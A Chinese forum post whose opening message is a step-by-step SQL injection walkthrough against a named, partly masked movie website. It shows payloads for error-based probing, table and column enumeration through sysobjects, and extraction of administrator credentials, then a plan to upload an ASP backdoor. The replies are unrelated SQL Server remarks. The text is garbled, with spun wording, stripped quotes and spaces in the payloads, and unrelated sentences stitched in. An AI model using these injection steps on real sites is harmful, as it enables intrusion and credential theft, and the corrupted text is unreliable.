仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 1052|回复: 8
打印 上一主题 下一主题

[学习教程] MSSQL编程:SQL注进的新技能

[复制链接]
萌萌妈妈 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 22:37:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
我们只需要把binlog文件反向执行,每个操作都执行逆操作即可。当然也不是所有的event都反转。Table_mapevent必须还是在Rows_log_event每个操作之前。技能 SQL注进的新技能来历:黑客基地
表名和字段名的取得
合用情形:
1)数据库是MSSQL
2)毗连数据库的只是一般用户
3)不晓得ASP源代码

能够举行的打击
1)对数据内容举行增加,检察,变动

实例:
本文件以
http://www.dy***.com/user/wantpws.asp
为列举行测试打击。

第一步:
在输出用户名处输出单引号,显现
MicrosoftOLEDBProviderforSQLServer毛病80040e14
字符串之前有未闭合的引号。

/user/wantpws.asp,行63

申明没有过滤单引号且数据库是MSSQL.

第二步:
输出a;usemaster;--
显现
MicrosoftOLEDBProviderforSQLServer毛病80040e21
多步OLEDB操纵发生毛病。假如大概,请反省每一个OLEDB形态值。没有事情被完成。

/user/wantpws.asp,行63
如许申明没有权限了。

第三步:
输出:aornamelikefff%;--
显现有一个叫ffff的用户哈。

第四步:
在用户名处输出
ffffand1(selectcount(email)from[user]);--
显现:
MicrosoftOLEDBProviderforSQLServer毛病80040e37
工具名user有效。

/user/wantpws.asp,行96

申明没有叫user的表,换成users尝尝乐成,同时申明有一个叫email的列.
(西方飘云的一个举措是输出ahaving1=1--
一样平常前往以下也就能够间接失掉表名和一个字段名了
MicrosoftOLEDBProviderforSQLServer毛病80040e14
列users.ID在选择列表中有效,由于该列未包括在聚合函数中,而且没有GROUPBY子句。

/user/wantpws.asp,行63


)

如今我们晓得了ffff用户的暗码是111111.

上面经由过程语句失掉数据库中的一切表名和字段名。

第五步:
输出:
ffff;update[users]setemail=(selecttop1namefromsysobjectswherextype=uandstatus>0)wherename=ffff;--
申明:
下面的语句是失掉数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
经由过程检察ffff的用户材料可得第一个用表叫ad
然后依据表名ad失掉这个表的ID
ffff;update[users]setemail=(selecttop1idfromsysobjectswherextype=uandname=ad)wherename=ffff;--
同上可知id是:581577110
因为工具标记id是依据由小到年夜分列的以是我们能够失掉一切的用户表的名字了
象上面如许就能够失掉第二个表的名字了
ffff;update[users]setemail=(selecttop1namefromsysobjectswherextype=uandid>581577110)wherename=ffff;--

ad581577110
users597577167
buy613577224
car629577281
learning645577338
log661577395
movie677577452
movieurl693577509
password709577566
type725577623
talk

经由一段工夫的推测后我们失掉下面的剖析一下应当分明password,users是最得要的

第六步:猜主要表的字段
输出:
如今就看看users表有哪些字段
ffff;update[users]setemail=(selecttop1col_name(object_id(users),3)fromusers)wherename=ffff;--
失掉第三个字段是password
ffff;update[users]setemail=(selecttop1col_name(object_id(users),4)fromusers)wherename=ffff;--
失掉第四个字段是name
最初users表的字段共28个全失掉了
(注:另外一个失掉字段的举措,条件是体系的前往堕落信息
agroupbyIDhaving1=1--
失掉
MicrosoftOLEDBProviderforSQLServer毛病80040e14
列users.userid在选择列表中有效,由于该列既不包括在聚合函数中,也不包括在GROUPBY子句中。

/user/wantpws.asp,行63
这个第二个字段就是userid
显现第三个字段。
agroupbyid,useridhaving1=1--

MicrosoftOLEDBProviderforSQLServer毛病80040e14
列users.password在选择列表中有效,由于该列既不包括在聚合函数中,也不包括在GROUPBY子句中。

/user/wantpws.asp,行63
失掉是password
同理,一向显现出一切。:)
)

users表
1234
iduseridpasswordname

5678910111213141516
Provincehomeaddresscityadressstarlooksexemailnlooknosdatemoneysend

171819202122232425262728
oklookdnlooklasthitsphoneaskmejoingetmoneypaynologintimemflagstatepostnote


starlook--121020032:41PM
nlook---0
nos---2上岸次数
date--1210200312:00AM注册工夫?
money--同上
send--空
oklook--0
dnlook--0
getmoney--0
state--0
note--这家伙很。。。申明

password表
123
idnamepwd

然后我又试ad本来是用来纪录告白击点的。。
然后又试password表失掉有name和pwd字段。
实行
ffff;update[users]setemail=(selecttop1namefrompassword)wherename=ffff;--
可得第一个用户名是admin123看样儿多数是办理员了。
然后又失掉了暗码是dy***dick188仍是打星号算了哈哈...

如许我们就完整进进了这个影戏网站的背景了哈哈。
http://www.dy***.com/login.asp

再进一步还能够晓得办理员一共有三人暗码也都能看到了。
ffff;update[users]setemail=(selecttop1count(id)frompassword)wherename=ffff;--
ffff;update[users]setemail=(selecttop1pwdfrompasswordwhereid=2)wherename=ffff;--

ffff;update[users]setemail=(selecttop1namefrompasswordwhereid=2)wherename=ffff;--


只是能收费看影戏好象还不敷哈..我看了看它的背景办理本来在
增加影戏的中央关于上传的图片没有过滤.asa的文件,如许我就
能上传一个asp后门并实行.


为多种编程语言提供了API。这些编程语言包括C、C++、Python、Java、Perl、PHP、Eiffel、Ruby和Tcl等。
只想知道 该用户已被删除
沙发
发表于 2015-1-19 18:58:23 | 只看该作者
一直以来个人感觉SQLServer的优化器要比Oracle的聪明。SQL2005的更是比2k聪明了不少。(有次作试验发现有的语句在200万级时还比50万级的相同语句要快show_text的一些提示没有找到解释。一直在奇怪。)
活着的死人 该用户已被删除
板凳
发表于 2015-1-28 09:27:09 | 只看该作者
语句级快照和事务级快照终于为SQLServer的并发性能带来了突破。个人感觉语句级快照大家应该应用。事务级快照,如果是高并发系统还要慎用。如果一个用户总是被提示修改不成功要求重试时,会杀人的!
爱飞 该用户已被删除
地板
发表于 2015-2-5 15:27:27 | 只看该作者
大家注意一点。如下面的例子:
第二个灵魂 该用户已被删除
5#
发表于 2015-2-12 14:35:40 | 只看该作者
以前的DTS轻盈简单。但是现在的SSIS虽然功能强大了很多,但是总是让人感觉太麻烦。看看论坛中询问SSIS的贴子就知道。做的功能太强大了,往往会有很多用户不会用了
再现理想 该用户已被删除
6#
发表于 2015-3-3 03:44:49 | 只看该作者
理解了存储结构,再阅读下性能优化的章节基本上会对sqlserver有个清晰地认识
金色的骷髅 该用户已被删除
7#
发表于 2015-3-11 09:21:31 | 只看该作者
我是新手,正在学习数据库和操作系统,深感理论的泛广,唯有一步一步来,但是又感觉时间不够,收集了很多资料却总是没能认真的看完,希望有一个讨论板块,大家共同解决,共同分享,共同努力
小魔女 该用户已被删除
8#
发表于 2015-3-18 03:14:05 | 只看该作者
微软对CLR作了大篇幅的宣传,这是因为数据库产品终于融入.net体系中。最开始我们也是狂喜,感觉对象数据库的一些概念可以实现了。
9#
发表于 2015-3-25 10:35:05 | 只看该作者
发几份SQL课件,以飨阅者
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-22 23:48

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表